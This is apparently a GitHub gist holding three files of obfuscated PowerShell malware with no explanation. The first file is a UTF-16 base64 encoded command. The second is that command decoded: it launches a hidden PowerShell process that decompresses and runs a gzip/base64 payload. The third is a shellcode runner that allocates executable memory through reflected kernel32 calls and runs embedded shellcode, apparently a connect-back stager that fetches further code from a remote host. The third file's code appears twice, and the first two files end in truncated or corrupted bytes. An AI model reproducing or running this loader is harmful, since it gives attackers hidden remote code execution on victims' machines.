0ccupi3R/gist:247870973e2832eb3a4fc8622ab99818

## gistfile1.txt
aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARwB6AGkAcABTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAJwBIADQAcwBJAEEASAAvAEoASgBGAHcAQwBBADcAVgBXACsAMgAvAGIATgBoAEQAKwBPAFEAWAA2AFAAdwBpAEYAQQBVAG0ASQBZADEAbQBKADIANwBRAEIAQwBvAHoAeQAyADcAVQBTAE8ANABwAGYAOABZAHkAQgBsAGkAaQBaAE0AUwBVADYARgBPAFYAWAAxAC8AOQA5AEoAMQB0AHEAMAB5AFgAZAAyAGcARQBUAC8AQwBDAFAAZAArAFQAZABkADkAOABkADUAUwBlAFIASwB5AG0AUABGAE0AYQBXAFQAZQBYAHoANgAxAGMAbgBQAFMAeAB3AHEARwBpAEYANQBiADYAbwBGAEYAeQArADYAZQBvAG4ASgB5AEEAdQBzAEsANwB5AFUAZABHAG0AYQBMAFcAcQA4AFIARABUAGEASABaADEAVgBVADIARQBJAEoARQA4AHoAawB0AE4ASQBsAEUAYwBrADMARABPAEsASQBrADEAWABmAGwAVABHAFMAMgBJAEkARwBjADMAOAB3AGYAaQBTAHUAVwB6AFUAdgBpAGoAMQBHAFIAOABqAGwAbQBtAHQAcQB0AGkAZAAwAEcAVQBNAHgAUgA1ADYAVgBxAFgAdQB6AGgAMQBwAGUAUwBzAEcASgBXAGEAKwB2AHYAdgBxAGoANAA5AE0AMgBlAGwAKwBtAE8AQwBXAGEAeQBwAHoAaQA2AFcASgBDAHgANQBqAEsAbQA2ADgAawBWAFAARAA3AHoAYgByAFkAaQBtADIAdABRAFYAUABPAGEAKwBMAEkAMQBvAGQASABGAGUARwBrAFEAeAA5AHMAawAxADcATABZAG0ATgBwAEUATAA3AHMAVwBxAEQAagBIAEEAUgB4AEMAWgBpAEUAaQBCAGEARgBMAHoANAA2AEsAbQB3AHIAQQBuAHUASQBzADgAVAA1AEEAWQBkAEUAdgB0AGEATQAyAFgAUgBDAHQARQBDAFcATgBGADUAVABkAHQAbQBwADEAOQBtADAAUwBTAGgAZwBUAFcASgBSAEYAOAA1AFIAQwB4AHAAaQA2AEoAUwB5ADAAYwBlAFkAegBjAEUAbgArAG0AWABaAE4ATgBIAHYATABQAEcAbQBsAFAAagBVAEMAcgBKADQAVgBlAGgAQgBRADgAYwA5AEwAbQBYAHMATABJADAAVQA3AFYAbgA3AHMASgBTAGQAUABoAHkAUgBNAEgATQBYADkANQAvAGUAcgAxAEsAegA5AFAAOABzAFkAMgA1ADAAKwBUAEQASwBPAFQANgBXAEYATQB3AEQAVwB0AHgAMgBOADYAMABQAHUAbwBsAEkAdQBLAEQAYwBkAGcAeQBjAFUATwBwAG8AVQA3AGsAUgBCADkAcABrAHgAVAB3AEsAZQB6AG0AVgBJAFEAbAA2AGoANABZADMATQB6ADEAdwBYAE4AOQBZAHAANABJAEoAbwBPAE8AZgBWAG0AWQBKAEoAbABvAGkARAA3AEUAVQByAGwAUAAyAFoAVQBqAGYAZwAwAEkAcgBWAGQAaABFAFAAcQA1AHEAVABSAFgAawBLAFkAKwBJAHcAYwBRAGkAegBsAGEAdABmAGcAbABLAFoAbQBDADgAUwByAEUAVQBZAEMATABGAFAAVQBpAHMAcgAwAHUAVgBrADkAcABQAEsAcgByAFoAVgBRADUAaABHAEIAWABNAGgAUwBEAEYANQBCAEEAdgBYAHYAbgBUAGsAbQBRAGwAUABiAGsAVQAxAEMAZwBPAGcANABWAHcARgA0AEgANgBoAEsAYwB1ADIATQBuAHIAdgA4ADkASABRAE8AUwBtAHEAVgA0AFQAZwB1AEsAcgAwAEUAYQBzAFUAdABLAGcANwBCAGoASABoAEYAQgBVAFUAeAB6AFoAWgBRAEkAdgBsAGgAcQBIADUAegAxADAANgBZAHAAQwA2AE8AWgBiADcAZABUAE0AOQB4AHoATQA2AHIAOABpAGkAVwBJAG4ARQBoAGEAeABEADcAbgBiAE0AaQBMAHMAVQBzAGgAYQBLAG8AdABLAGgASAByAEoAMQBEAGcALwB4AGMAOQBVAFUAZwBxAHAAZwB4AEcAZwBXAHcAMAB4AG8AUwBBAFoASQBVAEEARQBlAG0AWABCAEQAZwBZAHAAcAAzAHYAZQBRAFEAMgBRADUAWABqAEkAUwBnAGMAcQBqAFoAQgBzAE0AQgBWAEcAagBHADkAQQBOADMAYwBFAEEAOAA5AGUAOABPADUAbAB3ACsARQBqAGUARgBJAHMAZgBnAGkAWAB1AFEAWAA0AGQAeABXAFYAUwBHAFYARQBnAG8ALwBSAFQAVwBsAEUAVAAvADYAZgBRAG4ATgBYAC8AdwBvAHkAcABJAGwAZwBnAHQATAA0ACsAcAB0AFoATQBwAHEAUQB2AEwAbABwAGsAUwBNAGcAUABsAEEASQBHAFEARQBIADUARAA4AE4ARABDAE0AWABsAFgAYwBhAFEAQQBjAEwAUQAzAHgAZwAyAHQASQBuAGcAbQA3AFkAagBaAHIAcgBXAGsASgB0AHAAUQBzADIAMwBEAGQAMABBAHYAMgByAHgAMgA2AFgAMwBxAFAATABRAE0AVQBkAHMAdQBmAE4AUwBPADIAMwBhAHIAVgArAHUAMwBXAHAAVgAxAHgAeABsAFcAcABGAE4AdgB5ADAAKwA5AHQAcgBUAHIANAA0AGMASABCADcAVgB1AEIAeABOADUAMwAwAGEAdABPADEAcABlAFQAaQByADcAVgBZAGYAdQBuAFMANwB5AEoAbAB2AGoAMwBkADcAYQBiADgAcgBXAGQAdgA4AFEAZQBQADYAawA1AHYAdgBCAHAAZQAvAGMAbQBtADgAYgB0AEQAdQBxADkAcQAzAHkATwBlADcAVwA2AGsAbAAzAFoARwAyAHMAYwBpAFcAdQAwADAAMgByAFQAdwBmADkAWgBhAGMAaAA1ADUATQBoAHcAdwBQAGYAQwBNAGIAbQBCADAAeQAzAFgAZgBFAHcATgBMAG0AOQBiAHkAUABVAFgARgB5ADQAKwA0ADQALwBiAEMANQBzAGIAegBkAHAAVQBmAEoAZwBsAEwAdQAwAGoALwBvAEkAZgBYAEoAdgBCADQATgBtAHMAQQBxAGEATQBUAEkAKwBEAEIAKwByAEkAWQAwAGIAaQBGAGMAeABhAHEAUAA2ADgARgAzAG4ATABiAFAANgBnADQAYQBGAEIAbgBXAHIAagAyADkANAA3ACsASwAwAFoAcABqADMAMwBtAE8AOQBjAFQALwBHAG4AWgBCADUAegBaAFoAaABUAHMAYgBJAFEAOABLADQAQwB4AGIAbQA1AGMAMABpAFMAbgBIAEMAZwBmAFYAbwBwAFQAcQBvAGUANwA5AHIARwBLAEQAVABxADYAQgBXADUAWgB6AHUANwB4AC8ANwB6AFEARABWAFEAVwBjAFkAYwBvAFEAYgBkAEQAawA0AEgAYwBPAGUAMQAzAGQAZwBNAHgAcQBZAEgAawBjAHkAYQBvADgATgBZAHgAZwBZAEEAZgBLAGQAeABRAFEAagBDADcAUwB0AFIAOQBTAHcAZQBIAFgAMwB2AG0AZgAzAGoATwBIAHcAZgBHAEgATwBsACsAWQBDAGYAQwBiAGoAOQBYAHUANwBnADAANABiAGIAcwA4AHcAagBOAE4AdwBEAHIAOABHAGMAdQAzAFYATgBoAHAAYgBtADgAdgAxAFIAdQBMAE8AQwBQAGEAKwBNAHoANABNAFAAcgA1AEoASwBRAEkAYwBLAGYAQwBiACsAbgByADcASgBQAGsALwA2AHQAawAyAEYAdgBFAEMATQB5AEEARgB0AE8ATwA4AEQAaAB0AGMATgBMAEkAVwAyACsATQAwAHQAZABDADAAdwAzADIANgBKAEMASQBpAEQARwA0AGsAdQBMAE4AeQBOAGkAUABHAHUASgB1ADIAOQAwAE0AegBoAHEAdgBsADIAUABCAG4AVQBJADAARABHAEYANgBjAHYAegBqAFMAbABhACsASwArAHIAZgBHAG4ANAB1AHUAcgB1ADcAQgBTADYAZwBQAFkASABDAHAAUwA2AEoAQQBMAG8AcgBsADcAVQBXADUARABHADIAOAB2AEsAMgBVAEkAYwBxAGYARAA2AHoASwBWAHoAcwB0ADMAYQBtAFkAMwBnAEoASABaAEwASwB0ADIAVwBGAHIAUABTADIAYQBnAHEAagA5AHYAMwBCAGwAaABiAHEAQQBQACsALwBmADQAUABvAG0AKwA0AGYAVgBuADQASwB3AFgATQB3AEMAZgBpAGIALwBYAHYAQgBMAGkAUAA1AHkANwBDAE4ATQBKAFcAZwA2ADAARwBzAFkATwBWADUAMQBMADAATwBRAGsAZQBQAEoAcQA0AEMAbwBRAGUAYgA5ADcARQBsAGYAdwBtADQAUwBlAFgAWQBOADcAdwBkAC8AQQBmAFIAUgBuAGgAdgBxAEMAUQBBAEEAJwAnACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQAnADsAJABzAC4AVQBzAGUAUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAPQAkAGYAYQBsAHMAZQA7ACQAcwAuAFIAZQBkAGkAcgBlAGMAdABTAHQAYQBuAGQAYQByAGQATwB1AHQAcAB1AHQAPQAkAHQAcgB1AGUAOwAkAHMALgBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAPQAnAEgAaQBkAGQAZQBuACcAOwAkAHMALgBDAHIAZQBhAHQAZQBOAG8AVwBpAG4AZABvAHcAPQAkAHQAcgB1AGUAOwAkAHAAPQBbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBTAHQmsf

## gistfile2.txt
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAH/JJFwCA7VW+2/bNhD+OQX6PwiFAUmIY1mJ27QBCozy27USO4pf8YyBliiZMSU6FOVX1/99J1tq0yXd2gET/CCPd+Tdd98d5SeRKymPFMaWTeXz61cnPSxwqGiF5b6oFFy+6eonJyAusK7yUdGmaLWq8RDTaHZ1VU2EIJE8zktNIlEck3DOKIk1XflTGS2IIGc38wfiSuWzUvij1GR8jlmmtqtid0GUMxR56VqXuzh1peSsGJWa+vvvqj49M2el+mOCWaypzi6WJCx5jKm68kVPD7zbrYim2tQVPOa+LI1odHFeGkQx9sk17LYmNpEL7sWqDjHARxCZiEiBaFLz46KmwrAnuIs8T5AYdEvtaM2XRCtECWNF5Tdtmp19m0SShgTWJRF85RCxpi6JSy0ceYzcEn+mXZNNHvLPGmlPjUCrJ4VehBQ8c9LmXsLI0U7Vn7sJSdPhyRMHMX95/er1Kz9P8sY250+TDKOT6WFMwDWtx2N60PuolIuKDcdgycUOpoU7kRB9pkxTwKezmVIQl6j4Y3Mz1wXN9Yp4IJoOOfVmYJJloiD7EUrlP2ZUjfg0IrVdhEPq5qTRXkKY+IwcQizlatfglKZmC8SrEUYCLFPUisr0uVk9pPKrrZVQ5hGBXMhSDF5BAvXvnTkmQlPbkU1CgOg4VwF4H6hKcu2Mnrv89HQOSmqV4TguKr0EasUtKg7BjHhFBUUxzZZQIvlhqH5z106YpC6OZb7dTM9xzM6r8iiWInEhaxD7nbMiLsUshaKotKhHrJ1Dg/xc9UUgqpgxGgWw0xoSAZIUAEemXBDgYpp3veQQ2Q5XjISgcqjZBsMBVGjG9AN3cEA89e8O5lw+EjeFIsfgiXuQX4dxWVSGVEgo/RTWlET/6fQnNX/woypIlggtL4+ptZMpqQvLlpkSMgPlAIGQEH5D8NDCMXlXcaQAcLQ3xg2tIngm7YjZrrWkJtpQs23Dd0Av2rx26X3qPLQMUdsufNSO23arV+u3WpV1xxlWpFNvy0+9trTr44cHB7VuBxN530atO1peTir7VYfunS7yJlvj3d7ab8rWdv8QeP6k5vvBpe/cmm8btDuq9q3yOe7W6kl3ZG2sciWu002rTwf9Zach55MhwwPfCMbmB0y3XfEwNLm9byPUXFy4+44/bC5sbzdpUfJglLu0j/oIfXJvB4NmsAqaMTI+DB+rIY0biFcxaqP68F3nLbP6g4aFBnWrj2947+K0Zpj33mO9cT/GnZB5zZZhTsbIQ8K4Cxbm5c0iSnHCgfVopTqoe79rGKDTq6BW5Zzu7x/7zQDVQWcYcoQbdDk4HcOe13dgMxqYHkcyao8NYxgYAfKdxQQjC7StR9SweHX3vmf3jOHwfGHOl+YCfCbj9Xu7g04bbs8wjNNwDr8Gcu3VNhpbm8v1RuLOCPa+Mz4MPr5JKQIcKfCb+nr7JPk/6tk2FvECMyAFtOO8DhtcNLIW2+M0tdC0w326JCIiDG4kuLNyNiPGuJu290Mzhqvl2PBnUI0DGF6cvzjSla+K+rfGn4uuru7BS6gPYHCpS6JALorl7UW5DG28vK2UIcqfD6zKVzst3amY3gJHZLKt2WFrPS2agqj9v3BlhbqAP+/f4Pom+4fVn4KwXMwCfib/XvBLiP5y7CNMJWg60GsYOV51L0OQkePJq4CoQeb97Elfwm4SeXYN7wd/AfRRnhvqCQAA''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::St&±

## gistfile3.txt
function llkG {
	Param ($kz, $cowL)
	$lL = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

	return $lL.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($lL.GetMethod('GetModuleHandle')).Invoke($null, @($kz)))), $cowL))
}

function wM1b {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $r7A,
		[Parameter(Position = 1)] [Type] $vped = [Void]
	)

	$tQnA = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$tQnA.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $r7A).SetImplementationFlags('Runtime, Managed')
	$tQnA.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $vped, $r7A).SetImplementationFlags('Runtime, Managed')

	return $tQnA.CreateType()
}

[Byte[]]$kH1 = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmisFAoCaAIAEV6J5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U=")

$oOEvx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll VirtualAlloc), (wM1b @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $kH1.Length,0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($kH1, 0, $oOEvx, $kH1.length)

$rD = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll CreateThread), (wM1b @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$oOEvx,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll WaitForSingleObject), (wM1b @([IntPtr], [Int32]))).Invoke($rD,0xffffffff) | Out-Null
	function llkG {
	Param ($kz, $cowL)
	$lL = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')

	return $lL.GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($lL.GetMethod('GetModuleHandle')).Invoke($null, @($kz)))), $cowL))
	}

	function wM1b {
	Param (
	[Parameter(Position = 0, Mandatory = $True)] [Type[]] $r7A,
	[Parameter(Position = 1)] [Type] $vped = [Void]
	)

	$tQnA = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$tQnA.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $r7A).SetImplementationFlags('Runtime, Managed')
	$tQnA.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $vped, $r7A).SetImplementationFlags('Runtime, Managed')

	return $tQnA.CreateType()
	}

	[Byte[]]$kH1 = [System.Convert]::FromBase64String("/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiLWCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/0LiQAQAAKcRUUGgpgGsA/9VqCmisFAoCaAIAEV6J5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBWU1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMpxnXBw7vwtaJWagBT/9U=")

	$oOEvx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll VirtualAlloc), (wM1b @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke([IntPtr]::Zero, $kH1.Length,0x3000, 0x40)
	[System.Runtime.InteropServices.Marshal]::Copy($kH1, 0, $oOEvx, $kH1.length)

	$rD = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll CreateThread), (wM1b @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$oOEvx,[IntPtr]::Zero,0,[IntPtr]::Zero)
	[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((llkG kernel32.dll WaitForSingleObject), (wM1b @([IntPtr], [Int32]))).Invoke($rD,0xffffffff) \| Out-Null